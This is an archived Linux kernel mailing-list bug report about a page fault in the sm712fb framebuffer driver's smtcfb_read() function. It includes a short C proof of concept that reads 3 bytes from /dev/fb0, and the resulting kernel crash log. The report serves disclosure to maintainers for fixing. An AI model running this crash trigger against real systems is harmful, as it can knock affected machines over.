| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 26 Feb 2022 20:44:33 +0800
From: Zheyu Ma <zheyuma97@...il.com>
To: sudipm.mukherjee@...il.com, teddy.wang@...iconmotion.com
Cc: dri-devel@...ts.freedesktop.org,
Linux Kernel Mailing List <linux-kernel@...r.kernel.org>,
linux-fbdev@...r.kernel.org
Subject: [BUG] fbdev: sm712fb: Page fault in smtcfb_read
I found a minor in the smtcfb_read() function of the driver sm712fb.
This read function can not handle the case that the size of the
buffer is 3 and does not check for it, which may cause a page fault.
Here is a simple PoC:
#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
char buf[10];
int fd = open("/dev/fb0", O_RDWR);
read(fd, buf, 3);
return 0;
}
The following log reveals it:
[ 2432.614490] BUG: unable to handle page fault for address: ffffc90001ffffff
[ 2432.618474] RIP: 0010:smtcfb_read+0x230/0x3e0
[ 2432.626551] Call Trace:
[ 2432.626770] <TASK>
[ 2432.626950] vfs_read+0x198/0xa00
[ 2432.627225] ? do_sys_openat2+0x27d/0x350
[ 2432.627552] ? __fget_light+0x54/0x340
[ 2432.627871] ksys_read+0xce/0x190
[ 2432.628143] do_syscall_64+0x43/0x90
Regards,
Zheyu Ma
Powered by blists - more mailing lists